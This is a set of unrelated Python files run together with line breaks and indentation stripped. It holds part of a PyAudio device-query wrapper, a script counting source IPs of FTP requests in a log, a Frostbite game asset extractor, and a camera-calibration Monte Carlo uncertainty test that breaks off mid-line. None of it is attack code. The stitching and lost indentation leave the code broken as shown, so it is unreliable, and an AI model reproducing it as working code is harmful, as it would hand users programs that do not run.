(`PaSampleFormat`). :rtype: bool :raises ValueError: tuple containing: (error string, PortAudio error code `PaErrorCode`). """ if input_device == None and output_device == None: raise ValueError("must specify stream format for input, " +\ "output, or both", paInvalidDevice); kwargs = {} if input_device != None: kwargs['input_device'] = input_device kwargs['input_channels'] = input_channels kwargs['input_format'] = input_format if output_device != None: kwargs['output_device'] = output_device kwargs['output_channels'] = output_channels kwargs['output_format'] = output_format return pa.is_format_supported(rate, **kwargs) def get_default_input_device_info(self): """ Return the default input Device parameters as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :raises IOError: No default input device available. :rtype: dict """ device_index = pa.get_default_input_device() return self.get_device_info_by_index(device_index) def get_default_output_device_info(self): """ Return the default output Device parameters as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :raises IOError: No default output device available. :rtype: dict """ device_index = pa.get_default_output_device() return self.get_device_info_by_index(device_index) def get_device_info_by_index(self, device_index): """ Return the Device parameters for device specified in `device_index` as a dictionary. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :param `device_index`: The device index. :raises IOError: Invalid `device_index`. :rtype: dict """ return self._make_device_info_dictionary( device_index, pa.get_device_info(device_index) ) def _make_device_info_dictionary(self, index, device_info): """ Internal method to create Device Info dictionary that mirrors PortAudio's ``PaDeviceInfo`` structure. 
:rtype: dict """ return {'index' : index, 'structVersion' : device_info.structVersion, 'name' : device_info.name, 'hostApi' : device_info.hostApi, 'maxInputChannels' : device_info.maxInputChannels, 'maxOutputChannels' : device_info.maxOutputChannels, 'defaultLowInputLatency' : device_info.defaultLowInputLatency, 'defaultLowOutputLatency' : device_info.defaultLowOutputLatency, 'defaultHighInputLatency' : device_info.defaultHighInputLatency, 'defaultHighOutputLatency' : device_info.defaultHighOutputLatency, 'defaultSampleRate' : device_info.defaultSampleRate } ###################################################################### # Host Specific Stream Info ###################################################################### try: paMacCoreStreamInfo = pa.paMacCoreStreamInfo except AttributeError: pass else: class PaMacCoreStreamInfo: """ Mac OS X-only: PaMacCoreStreamInfo is a PortAudio Host API Specific Stream Info data structure for specifying Mac OS X-only settings. Instantiate this class (if desired) and pass the instance as the argument in `PyAudio.open` to parameters ``input_host_api_specific_stream_info`` or ``output_host_api_specific_stream_info``. (See `Stream.__init__`.) :note: Mac OS X only. :group Flags (constants): paMacCoreChangeDeviceParameters, paMacCoreFailIfConversionRequired, paMacCoreConversionQualityMin, paMacCoreConversionQualityMedium, paMacCoreConversionQualityLow, paMacCoreConversionQualityHigh, paMacCoreConversionQualityMax, paMacCorePlayNice, paMacCorePro, paMacCoreMinimizeCPUButPlayNice, paMacCoreMinimizeCPU :group Settings: get_flags, get_channel_map """ paMacCoreChangeDeviceParameters = pa.paMacCoreChangeDeviceParameters paMacCoreFailIfConversionRequired = pa.paMacCoreFailIfConversionRequired paMacCoreConversionQualityMin = pa.paMacCoreConversionQualityMin paMacCoreConversionQualityMedium = pa.paMacCoreConversionQualityMedium paMacCoreConversionQualityLow = pa.paMacCoreConversionQualityLow paMacCoreConversionQualityHigh = pa.paMacCoreConversionQualityHigh paMacCoreConversionQualityMax = pa.paMacCoreConversionQualityMax paMacCorePlayNice = pa.paMacCorePlayNice paMacCorePro = pa.paMacCorePro paMacCoreMinimizeCPUButPlayNice = pa.paMacCoreMinimizeCPUButPlayNice paMacCoreMinimizeCPU = pa.paMacCoreMinimizeCPU def __init__(self, flags = None, channel_map = None): """ Initialize with flags and channel_map. See PortAudio documentation for more details on these parameters; they are passed almost verbatim to the PortAudio library. :param `flags`: paMacCore* flags OR'ed together. See `PaMacCoreStreamInfo`. :param `channel_map`: An array describing the channel mapping. See PortAudio documentation for usage. """ kwargs = {"flags" : flags, "channel_map" : channel_map} if flags == None: del kwargs["flags"] if channel_map == None: del kwargs["channel_map"] self._paMacCoreStreamInfo = paMacCoreStreamInfo(**kwargs) def get_flags(self): """ Return the flags set at instantiation. :rtype: int """ return self._paMacCoreStreamInfo.flags def get_channel_map(self): """ Return the channel map set at instantiation. :rtype: tuple or None """ return self._paMacCoreStreamInfo.channel_map def _get_host_api_stream_object(self): """ Private method. 
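# ----------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes this
# wrapper is exposed as pyaudio.PyAudio with the usual PyAudio constants
# and Stream keyword arguments; treat it only as an illustration of the
# host-API/device inspection and format-checking methods documented above.
import pyaudio

p = pyaudio.PyAudio()
try:
    # Walk every host API and report how many devices it exposes.
    for api_index in range(p.get_host_api_count()):
        api = p.get_host_api_info_by_index(api_index)
        print(api['name'], api['deviceCount'])
    # is_format_supported returns True or raises ValueError, so probe the
    # default input device inside a try/except before opening a stream.
    default_in = p.get_default_input_device_info()
    try:
        p.is_format_supported(44100.0,
                              input_device=default_in['index'],
                              input_channels=1,
                              input_format=pyaudio.paInt16)
        stream = p.open(format=pyaudio.paInt16, channels=1,
                        rate=44100, input=True)
        stream.close()
    except ValueError:
        print("44.1 kHz / 16-bit / mono capture not supported on the default input")
finally:
    p.terminate()
# ----------------------------------------------------------------------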
""" return self._paMacCoreStreamInfo 1-10 #!/usr/bin/env python3 import sys import re def main(): content = open(sys.argv[1], 'r').read() regular_expression = r"(?<=EST;)[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+(?=;.+FTP;Request)" all_matches_li = re.findall(regular_expression, content) # print(all_matches_li) ip_dictionary = {} for ip in all_matches_li: if ip in ip_dictionary: ip_dictionary[ip] += 1 else: ip_dictionary[ip] = 1 # print(ip_dictionary) def compare_value(ip): return ip_dictionary[ip] sorted_dictionary = sorted(ip_dictionary, key=compare_value, reverse=True) # print(sorted_dictionary) for ip in sorted_dictionary[0:5]: print(ip, ip_dictionary[ip]) if __name__ == '__main__': main()#This script runs through all toc files it can find and uses that information to extract the files to a target directory. #Often the assets are actually stored in cascat archives (the sbtoc knows where to search in the cascat), which is taken care of too. #The script does not overwrite existing files (mainly because 10 sbtocs pointing at the same asset in the cascat would make the extraction time unbearable). import dbo import noncas import ebx import payload import cas import das import os from struct import pack,unpack import res #Adjust paths here. #do yourself a favor and don't dump into the Users folder (or it might complain about permission) gameDirectory = r"D:\Games\OriginGames\Need for Speed(TM) Rivals" targetDirectory = r"E:\GameRips\NFS\NFSR\pc\dump" ##################################### ##################################### def dump(tocPath,baseTocPath,outPath): """Take the filename of a toc and dump all files to the targetFolder.""" #Depending on how you look at it, there can be up to 2*(3*3+1)=20 different cases: # The toc has a cas flag which means all assets are stored in the cas archives. => 2 options # Each bundle has either a delta or base flag, or no flag at all. => 3 options # Each file in the bundle is one of three types: ebx/res/chunks => 3 options # The toc itself contains chunks. => 1 option # #Simplify things by ignoring base bundles (they just state that the unpatched bundle is used), #which is alright, as the user needs to dump the unpatched files anyway. # #Additionally, add some common fields to the ebx/res/chunks entries so they can be treated the same. #=> 6 cases. toc=dbo.readToc(tocPath) if not (toc.get("bundles") or toc.get("chunks")): return #there's nothing to extract (the sb might not even exist) sbPath=tocPath[:-3]+"sb" sb=open(sbPath,"rb") chunkPathToc=os.path.join(outPath,"chunks") bundlePath=os.path.join(outPath,"bundles") ebxPath=os.path.join(bundlePath,"ebx") resPath=os.path.join(bundlePath,"res") chunkPath=os.path.join(bundlePath,"chunks") ###read the bundle depending on the four types (+cas+delta, +cas-delta, -cas+delta, -cas-delta) and choose the right function to write the payload if toc.get("cas"): for tocEntry in toc.get("bundles"): #id offset size, size is redundant if tocEntry.get("base"): continue #Patched bundle. However, use the unpatched bundle because no file was patched at all. 
sb.seek(tocEntry.get("offset")) bundle=dbo.DbObject(sb) #pick the right function if tocEntry.get("delta"): writePayload=payload.casPatchedBundlePayload else: writePayload=payload.casBundlePayload for entry in bundle.get("ebx",list()): #name sha1 size originalSize path=os.path.join(ebxPath,entry.get("name")+".ebx") if writePayload(entry,path,False): ebx.addEbxGuid(path,ebxPath) for entry in bundle.get("res",list()): #name sha1 size originalSize resRid resType resMeta res.addToResTable(entry.get("resRid"),entry.get("name"),entry.get("resType"),entry.get("resMeta")) path=os.path.join(resPath,entry.get("name")+res.getResExt(entry.get("resType"))) writePayload(entry,path,False) for entry in bundle.get("chunks",list()): #id sha1 size logicalOffset logicalSize chunkMeta::h32 chunkMeta::meta path=os.path.join(chunkPath,entry.get("id").format()+".chunk") writePayload(entry,path,True) #Deal with the chunks which are defined directly in the toc. #These chunks do NOT know their originalSize. for entry in toc.get("chunks"): #id sha1 targetPath=os.path.join(chunkPathToc,entry.get("id").format()+".chunk") payload.casChunkPayload(entry,targetPath) else: for tocEntry in toc.get("bundles"): #id offset size, size is redundant if tocEntry.get("base"): continue #Patched bundle. However, use the unpatched bundle because no file was patched at all. sb.seek(tocEntry.get("offset")) if tocEntry.get("delta"): #The sb currently points at the delta file. #Read the unpatched toc of the same name to get the base bundle. baseToc=dbo.readToc(baseTocPath) for baseTocEntry in baseToc.get("bundles"): if baseTocEntry.get("id").lower() == tocEntry.get("id").lower(): break else: #if no base bundle has with this name has been found: pass #use the last base bundle. This is okay because it is actually not used at all (the delta has uses instructionType 3 only). basePath=baseTocPath[:-3]+"sb" base=open(basePath,"rb") base.seek(baseTocEntry.get("offset")) bundle=noncas.patchedBundle(base, sb) #create a patched bundle using base and delta base.close() writePayload=payload.noncasPatchedBundlePayload sourcePath=[basePath,sbPath] #base, delta else: bundle=noncas.unpatchedBundle(sb) writePayload=payload.noncasBundlePayload sourcePath=sbPath for entry in bundle.ebx: path=os.path.join(ebxPath,entry.name+".ebx") if writePayload(entry,path,sourcePath): ebx.addEbxGuid(path,ebxPath) for entry in bundle.res: res.addToResTable(entry.resRid,entry.name,entry.resType,entry.resMeta) path=os.path.join(resPath,entry.name+res.getResExt(entry.resType)) writePayload(entry,path,sourcePath) for entry in bundle.chunks: path=os.path.join(chunkPath,entry.id.format()+".chunk") writePayload(entry,path,sourcePath) #Deal with the chunks which are defined directly in the toc. #These chunks do NOT know their originalSize. for entry in toc.get("chunks"): #id offset size targetPath=os.path.join(chunkPathToc,entry.get("id").format()+".chunk") payload.noncasChunkPayload(entry,targetPath,sbPath) sb.close() def dumpRoot(dataDir,patchDir,outPath): os.makedirs(outPath,exist_ok=True) for dir0, dirs, ff in os.walk(dataDir): for fname in ff: if fname[-4:]==".toc": fname=os.path.join(dir0,fname) localPath=os.path.relpath(fname,dataDir) print(localPath) #Check if there's a patched version and extract it first. patchedName=os.path.join(patchDir,localPath) if os.path.isfile(patchedName): dump(patchedName,fname,outPath) dump(fname,None,outPath) def findCats(dataDir,patchDir,readCat): #Read all cats in the specified directory. 
for dir0, dirs, ff in os.walk(dataDir): for fname in ff: if fname=="cas.cat": fname=os.path.join(dir0,fname) localPath=os.path.relpath(fname,dataDir) print("Reading %s..." % localPath) readCat(fname) #Check if there's a patched version. patchedName=os.path.join(patchDir,localPath) if os.path.isfile(patchedName): print("Reading patched %s..." % os.path.relpath(patchedName,patchDir)) readCat(patchedName) #make the paths absolute and normalize the slashes gameDirectory=os.path.normpath(gameDirectory) targetDirectory=os.path.normpath(targetDirectory) #it's an absolute path already payload.zstdInit() print("Loading RES names...") res.loadResNames() #Load layout.toc tocLayout=dbo.readToc(os.path.join(gameDirectory,"Data","layout.toc")) if not tocLayout.getSubObject("installManifest") or \ not tocLayout.getSubObject("installManifest").getSubObject("installChunks"): if not os.path.isfile(os.path.join(gameDirectory,"Data","das.dal")): #Old layout similar to Frostbite 2 with a single cas.cat. #Can also be non-cas. dataDir=os.path.join(gameDirectory,"Data") updateDir=os.path.join(gameDirectory,"Update") patchDir=os.path.join(updateDir,"Patch","Data") if not tocLayout.getSubObject("installManifest"): readCat=cas.readCat1 else: readCat=cas.readCat2 #Star Wars: Battlefront Beta catPath=os.path.join(dataDir,"cas.cat") #Seems to always be in the same place. if os.path.isfile(catPath): print("Reading cat entries...") readCat(catPath) #Check if there's a patched version. patchedCat=os.path.join(patchDir,os.path.relpath(catPath,dataDir)) if os.path.isfile(patchedCat): print("Reading patched cat entries...") readCat(patchedCat) if os.path.isdir(updateDir): #First, extract all DLCs. for dir in os.listdir(updateDir): if dir=="Patch": continue print("Extracting DLC %s..." % dir) dumpRoot(os.path.join(updateDir,dir,"Data"),patchDir,targetDirectory) #Now extract the base game. print("Extracting main game...") dumpRoot(dataDir,patchDir,targetDirectory) else: #Special case for Need for Speed: Edge. Same as early FB3 but uses das.dal instead of cas.cat. dataDir=os.path.join(gameDirectory,"Data") print("Reading dal entries...") dalPath=os.path.join(dataDir,"das.dal") das.readDal(dalPath) print("Extracting main game...") das.dumpRoot(dataDir,targetDirectory) print("Extracting FE...") das.dumpFE(dataDir,targetDirectory) else: #New version with multiple cats split into install groups, seen in 2015 and later games. #Appears to always use cas.cat and never use delta bundles, patch just replaces bundles fully. dataDir=os.path.join(gameDirectory,"Data") updateDir=os.path.join(gameDirectory,"Update") patchDir=os.path.join(gameDirectory,"Patch") #Detect cat version. if tocLayout.getSubObject("installManifest").get("maxTotalSize")!=None: readCat=cas.readCat3 else: readCat=cas.readCat4 if os.path.isdir(updateDir): #First, extract all DLCs. for dir in os.listdir(updateDir): print("Extracting DLC %s..." % dir) dir=os.path.join(updateDir,dir,"Data") findCats(dir,patchDir,readCat) dumpRoot(dir,patchDir,targetDirectory) #Now extract the base game. 
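# ----------------------------------------------------------------------
# Hedged aside (illustrative sketch, not part of the original control flow).
# It condenses the layout detection used in this script into a single helper:
# old single-cat layout, the das.dal variant, or the newer split-cat layout
# whose cat version is chosen from installManifest's maxTotalSize field.
def detectLayout(gameDir):
    layout = dbo.readToc(os.path.join(gameDir, "Data", "layout.toc"))
    manifest = layout.getSubObject("installManifest")
    if not manifest or not manifest.getSubObject("installChunks"):
        if os.path.isfile(os.path.join(gameDir, "Data", "das.dal")):
            return "old layout using das.dal (e.g. Need for Speed: Edge)"
        return "old layout with a single cas.cat (possibly non-cas)"
    catVersion = 3 if manifest.get("maxTotalSize") is not None else 4
    return "new split-cat layout, cat version %d" % catVersion
# ----------------------------------------------------------------------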
print("Extracting main game...") findCats(dataDir,patchDir,readCat) dumpRoot(dataDir,patchDir,targetDirectory) if not os.path.isdir(targetDirectory): print("Nothing was extracted, did you set input path correctly?") sys.exit(1) print("Writing EBX GUID table...") ebx.writeGuidTable(targetDirectory) print ("Writing RES table...") res.writeResTable(targetDirectory) payload.zstdCleanup() 1-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Jun 2 20:11:26 2017 test uncertanty propagation wrt montecarlo @author: sebalander """ # %% import numpy as np import glob from calibration import calibrator as cl import matplotlib.pyplot as plt from importlib import reload import scipy.linalg as ln from numpy import sqrt, cos, sin from dev.bayesLib import flat2int import dev.bayesLib as bl import scipy.stats as sts import scipy.special as spe import pickle from calibration.calibrator import datafull, real, realdete, realbalk, realches from calibration.calibrator import synt, syntextr, syntches, syntintr def calculaCovarianza(xM, yM): ''' lso inputs son de tamaño (Nsamples, Mpuntos) con Nsamples por cada uno de los Mpuntos puntos ''' muXm = np.mean(xM, axis=0) muYm = np.mean(yM, axis=0) xMcen = xM.T - muXm.reshape(-1, 1) yMcen = yM.T - muYm.reshape(-1, 1) CmNum = np.empty((xM.shape[1], 2, 2), dtype=float) CmNum[:, 0, 0] = np.sum(xMcen**2, axis=1) CmNum[:, 1, 1] = np.sum(yMcen**2, axis=1) CmNum[:, 0, 1] = CmNum[:, 1, 0] = np.sum(xMcen*yMcen, axis=1) CmNum /= (xM.shape[0] - 1) return [muXm, muYm], CmNum # %% from scipy.stats import multivariate_normal N = 10000 M = 23 C = np.array([[[2,1],[1,3]]] * M) if np.all(np.linalg.eigvals(C) > 0): T = cl.unit2CovTransf(C) # calculate transform matriz X = np.random.randn(N, M, 2) # gen rndn points unitary normal X = (X.reshape((N, M, 1, 2)) * # transform T.reshape((1, M, 2, 2)) ).sum(-1) else: print('Error: la covarianza no es definida positiva') #X2 = multivariate_normal.rvs(mean=None, cov=C, size=n).T [muX, muY], CNum = calculaCovarianza(X[:,:,0], X[:,:,1]) #[muX2, muY2], CNum2 = calculaCovarianza(X2[0].reshape((-1,1)), X2[1].reshape((-1,1))) #print(C) #print(CNum) # #plt.figure() #plt.plot(C.flat, CNum.flat, '.') # #plt.figure() #ax = plt.gca() #xx = X[:,:,0].reshape(-1) #yy = X[:,:,1].reshape(-1) #ax.scatter(xx, yy, s=1, alpha=0.03) #cl.plotPointsUncert(ax, [C[0]], [0], [0], col='k') # # ##CNum2 #print(np.allclose(C, CNum, rtol=0.05)) # %% funcion que hace todas las cuentas def analyticVsMC(imgPts, Ci, F, K, Cintr, rtV, Crt, nPt, N, retPts=True): ''' Parameters and shapes ------- imagePoints: coordinates in image (N,2) Ci: uncertainty of imegePoints (N,2,2) F: Camera Matrix (3,3) Cf: uncertainty on the 4 parameters of camera matrix (nF,nF), tipically nF=4. 
K: intrinsic parameters, a vector (nK,) Ck: uncertainty of intrinsic parameters (nK, nK) Cfk: covariance of cross intrinsic parameters (nF,nK) rtV: vector of 6 pose params (6,) Crt: covariance on pose (6,6) ''' Cf = np.zeros((4, 4)) # param de CCD, dist focal, centro Cf[2:, 2:] += Cintr[:Ns[0], :Ns[0]] Ck = Cintr[Ns[0]:, Ns[0]:] # k de distorsion Cfk = Cintr[:Ns[0], Ns[0]:] rV, tV = rtV.reshape((2, -1)) # propagate to homogemous xd, yd, Cd, _ = cl.ccd2dis(imgPts[:, 0], imgPts[:, 1], F, Cccd=Ci, Cf=Cf) # go to undistorted homogenous xh, yh, Ch = cl.dis2hom(xd, yd, K, model, Cd=Cd, Ck=Ck, Cfk=Cfk) # project to map xm, ym, Cm = cl.xyhToZplane(xh, yh, rV, tV, Ch=Ch, Crt=Crt) # generar puntos y parametros # por suerte todas las pdfs son indep Ti = cl.unit2CovTransf(Ci) xI = (np.random.randn(N, nPt, 1, 2) * Ti.reshape((1, -1, 2, 2))).sum(-1) + imgPts Trt = cl.unit2CovTransf(Crt) rtVsamples = (np.random.randn(N, 1, 6) * Trt.reshape((1, 6, 6)) ).sum(-1) + rtV rots = rtVsamples[:, :3] # np.random.randn(N, 3).dot(np.sqrt(Cr)) + rV tras = rtVsamples[:, 3:] # np.random.randn(N, 3).dot(np.sqrt(Ct)) + tV # # para chequear que esta bien multiplicado esto # ertest = (rtVsamples[0] - rtV).dot(Crt).dot((rtVsamples[0] - rtV).T) # np.isclose(ertest, np.sum(((rtVsamples[0] - rtV).dot(Dextr))**2)) # np.isclose(ertest, np.sum(((rtVsamples[0] - rtV).dot(Dextr.T))**2)) Tintr = cl.unit2CovTransf(Cintr) fkVsamples = (np.random.randn(N, 1, Ns[1]) * Tintr.reshape((1, Ns[1], Ns[1])) ).sum(-1) + fkV kL = fkVsamples[:, :Ns[0]] kD = fkVsamples[:, Ns[0]:] # kD = np.random.randn(N, Cf.shape[0]).dot(np.sqrt(Cf)) + K # distorsion # kL = np.zeros((N, 3, 3), dtype=float) # lineal # kL[:, 2, 2] = 1 # kL[:, :2, 2] = np.random.randn(N, 2).dot(np.sqrt(Ck[2:, 2:])) + F[:2, 2] # kL[:, [0, 1], [0, 1]] = np.random.randn(N, 2).dot(np.sqrt(Ck[:2, :2])) # kL[:, [0, 1], [0, 1]] += F[[0, 1], [0, 1]] # estos son los puntos sampleados por montecarlo, despues de xD, yD, xH, yH, xM, yM = np.empty((6, N, nPt), dtype=float) for i in range(N): # F, K = flat2int(fkVsamples[i], Ns, model) # % propagate to homogemous camMat = bl.flat2CamMatrix(kL[i], model) xD[i], yD[i], _, _ = cl.ccd2dis(xI[i, :, 0], xI[i, :, 1], camMat) # % go to undistorted homogenous xH[i], yH[i], _ = cl.dis2hom(xD[i], yD[i], kD[i], model) # % project to map xM[i], yM[i], _ = cl.xyhToZplane(xH[i], yH[i], rots[i], tras[i]) muI, CiNum = calculaCovarianza(xI[:, :, 0], xI[:, :, 1]) muD, CdNum = calculaCovarianza(xD, yD) muH, ChNum = calculaCovarianza(xH, yH) muM, CmNum = calculaCovarianza(xM, yM) ptsTeo = [[xd, yd], [xh, yh], [xm, ym]] ptsNum = [muI, muD, muH, muM] ptsMC = [xI, xD, yD, xH, yH, xM, yM] covTeo = [Ci, Cd, Ch, Cm] covNum = [CiNum, CdNum, ChNum, CmNum] if retPts: return ptsTeo, ptsNum, covTeo, covNum, ptsMC else: return covTeo, covNum # %% LOAD DATA np.random.seed(0) # input plotCorners = False #import collections as clt fullDataFile = "./resources/fullDataIntrExtr.npy" dataFile = open(fullDataFile, "rb") fullData = pickle.load(dataFile) dataFile.close() # cam puede ser ['vca', 'vcaWide', 'ptz'] son los datos que se tienen camera = fullData.Synt.Intr.camera #modelos = ['poly', 'rational', 'fisheye', 'stereographic'] model = fullData.Synt.Intr.model Ns = [2,3] nH = fullData.Synt.Extr.h.shape[0] nAng = fullData.Synt.Extr.ang.shape[0] fkV = np.concatenate([fullData.Synt.Intr.uv, [fullData.Synt.Intr.k]]) # # load model specific data cameraMatrix, distCoeffs = flat2int(fkV, Ns, model) # load data rVall = fullData.Synt.Extr.rVecs rVall = np.transpose([rVall] * nH, (1, 0, 
2)).reshape((-1, 3)) tVall = fullData.Synt.Extr.tVecs.reshape((-1, 3)) rtVall = np.concatenate([rVall, tVall], axis=1) nPt = fullData.Synt.Extr.imgPt.shape[2] # cantidad de imagenes nIm = np.prod(fullData.Synt.Extr.imgPt.shape[:2]) # puntos por imagen # imagePoints = fullData.Synt.Extr.imgPt.reshape((nIm, nPt, 2)) chessboardModel = fullData.Synt.Ches.objPt imgSize = fullData.Synt.Intr.s # tomo las detecciones sin ruido imagePointsAll = fullData.Synt.Extr.imgPt.reshape((nIm, nPt, 2)) objpoints = np.array([chessboardModel]*nIm) # %%ELIJO UNA DE LAS IMAGENES imSel = 4 imgPts = imagePointsAll[imSel] rtV = rtVall[imSel] # covarianzas de 1% de desvest Cintr = np.diag((fkV / 1000)**2) Crt = np.diag((rtV / 1000)**2) Ci = (1.0**2) * np.array([np.eye(2)] * nPt) / 1 # 1pixel std N = 5000 # cantidad de realizaciones # %% #reload(cl) np.random.seed(0) retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt, nPt, N) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] = ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum # %% plot everything ptSelected = 7 # de lso 54 puntos este es el seleccionado para acercamiento fig = plt.figure() #from mpl_toolkits.axes_grid1.inset_locator import mark_inset #from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes figManager = plt.get_current_fig_manager() figManager.window.showMaximized() # plot initial uncertanties #figI = plt.figure(1) axI = plt.subplot(241) # figI.gca() cl.plotPointsUncert(axI, Ci, imgPts[:,0], imgPts[:,1], 'b') cl.plotPointsUncert(axI, CiNum, muI[0], muI[1], 'k') axI.plot(xI[:, :, 0].flat, xI[:, :, 1].flat, '.k', markersize=0.5) axI.axis('equal') axI.set_xlabel('xI') axI.set_ylabel('yI') # propagate to homogemous axD = plt.subplot(242) # figD.gca() cl.plotPointsUncert(axD, Cd, xd, yd, 'b') cl.plotPointsUncert(axD, CdNum, muD[0], muD[1], 'k') axD.plot(xD.flat, yD.flat, '.k', markersize=0.5) #axD.plot(xd[0], yd[0], 'xr', markersize=5) axD.axis('equal') axD.set_xlabel('xD') axD.set_ylabel('yD') # go to undistorted homogenous #figH = plt.figure(3) axH = plt.subplot(243) # figH.gca() cl.plotPointsUncert(axH, Ch, xh, yh, 'b') cl.plotPointsUncert(axH, ChNum, muH[0], muH[1], 'k') axH.plot(xH.flat, yH.flat, '.k', markersize=0.5) #axH.plot(xh[0], yh[0], 'xr', markersize=5) axH.axis('equal') axH.set_xlabel('xH') axH.set_ylabel('yH') for iPt in range(nPt): axH.text(xh[iPt], yh[iPt], iPt) # project to map #figM = plt.figure(4) axM = plt.subplot(244) # figM.gca() axM.plot(xm, ym, '+', markersize=2) cl.plotPointsUncert(axM, Cm, xm, ym, 'b') cl.plotPointsUncert(axM, CmNum, muM[0], muM[1], 'k') axM.plot(xM.flat, yM.flat, '.k', markersize=0.5) #axM.plot(xm[0], ym[0], 'xr', markersize=5) axM.axis('equal') axM.set_xlabel('xM') axM.set_ylabel('yM') for iPt in range(nPt): axM.text(xm[iPt], ym[iPt], iPt) # inset image axIins = plt.subplot(245) #axIins = zoomed_inset_axes(axI, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axI, axIins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axIins, [Ci[ptSelected]], [imgPts[ptSelected,0]], [imgPts[ptSelected,1]], 'b') cl.plotPointsUncert(axIins, [CiNum[ptSelected]], [muI[0][ptSelected]], [muI[1][ptSelected]], 'k') axIins.plot(xI[:, ptSelected, 0], xI[:, ptSelected, 1], '.k', markersize=0.5) axIins.axis('equal') #axIins.set_xticks([False]) #axIins.set_yticks([False]) #inset distorted axDins = plt.subplot(246) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 
2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axDins, [Cd[ptSelected]], [xd[ptSelected]], [yd[ptSelected]], 'b') cl.plotPointsUncert(axDins, [CdNum[ptSelected]], [muD[0][ptSelected]], [muD[1][ptSelected]], 'k') axDins.plot(xD[:, ptSelected], yD[:, ptSelected], '.k', markersize=0.5) axDins.axis('equal') #inset homogenous axHins = plt.subplot(247) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axHins, [Ch[ptSelected]], [xh[ptSelected]], [yh[ptSelected]], 'b') cl.plotPointsUncert(axHins, [ChNum[ptSelected]], [muH[0][ptSelected]], [muH[1][ptSelected]], 'k') axHins.plot(xH[:, ptSelected], yH[:, ptSelected], '.k', markersize=0.5) axHins.axis('equal') #inset world axMins = plt.subplot(248) #axDins = zoomed_inset_axes(axD, 30.0, loc=2) # zoom-factor: 2.5, location: upper-left #mark_inset(axD, axDins, loc1=1, loc2=4, fc="none", ec="0.5") cl.plotPointsUncert(axMins, [Cm[ptSelected]], [xm[ptSelected]], [ym[ptSelected]], 'b') cl.plotPointsUncert(axMins, [CmNum[ptSelected]], [muM[0][ptSelected]], [muM[1][ptSelected]], 'k') axMins.plot(xM[:, ptSelected], yM[:, ptSelected], '.k', markersize=0.5) axMins.axis('equal') # dibujo los rectangulos import matplotlib.patches as patches boxFactor = 10.0 #boxFactor_inv = 1 / boxFactor # caja en imagen boxIxy = np.array([axIins.get_xlim()[0], axIins.get_ylim()[0]]) # get caja boxIwh = np.array([axIins.get_xlim()[1] - boxIxy[0], axIins.get_ylim()[1] - boxIxy[1]]) boxIxy += boxIwh / 2 # centro de la caja boxIwh *= boxFactor # agrando la caja boxIxy -= boxIwh / 2 # esquina axI.add_patch(patches.Rectangle(boxIxy, boxIwh[0], boxIwh[1], fill=False)) # caja en distorsionado boxDxy = np.array([axDins.get_xlim()[0], axDins.get_ylim()[0]]) # get caja boxDwh = np.array([axDins.get_xlim()[1] - boxDxy[0], axDins.get_ylim()[1] - boxDxy[1]]) boxDxy += boxDwh / 2 # centro de la caja boxDwh *= boxFactor # agrando la caja boxDxy -= boxDwh / 2 # esquina axD.add_patch(patches.Rectangle(boxDxy, boxDwh[0], boxDwh[1], fill=False)) # caja en homogeneas boxHxy = np.array([axHins.get_xlim()[0], axHins.get_ylim()[0]]) # get caja boxHwh = np.array([axHins.get_xlim()[1] - boxHxy[0], axHins.get_ylim()[1] - boxHxy[1]]) boxHxy += boxHwh / 2 # centro de la caja boxHwh *= boxFactor # agrando la caja boxHxy -= boxHwh / 2 # esquina axH.add_patch(patches.Rectangle(boxHxy, boxHwh[0], boxHwh[1], fill=False)) # caja en mapa boxMxy = np.array([axMins.get_xlim()[0], axMins.get_ylim()[0]]) # get caja boxMwh = np.array([axMins.get_xlim()[1] - boxMxy[0], axMins.get_ylim()[1] - boxMxy[1]]) boxMxy += boxMwh / 2 # centro de la caja boxMwh *= boxFactor # agrando la caja boxMxy -= boxMwh / 2 # esquina axM.add_patch( patches.Rectangle(boxMxy, boxMwh[0], boxMwh[1], fill=False)) plt.tight_layout() # %% corro para todas la imagenes N = 5000 # cantidad de realizaciones np.random.seed(0) Ci = (1.0**2) * np.array([np.eye(2)]*nPt) / 1 # 1pixel std #lik = np.zeros((nIm, nPt, N)) xTeo = np.zeros((nIm, 2, nPt)) xMC = np.zeros((nIm, 2, nPt)) Cteo = np.zeros((nIm, nPt, 2, 2)) Cmc = np.zeros((nIm, nPt, 2, 2)) for imSel in range(nIm): print(imSel) imgPts = imagePointsAll[imSel] rtV = rtVall[imSel] # covarianzas de 1% de desvest Cintr = np.diag((fkV / 1000)**2) Crt = np.diag((rtV / 1000)**2) retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt, nPt, N) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] 
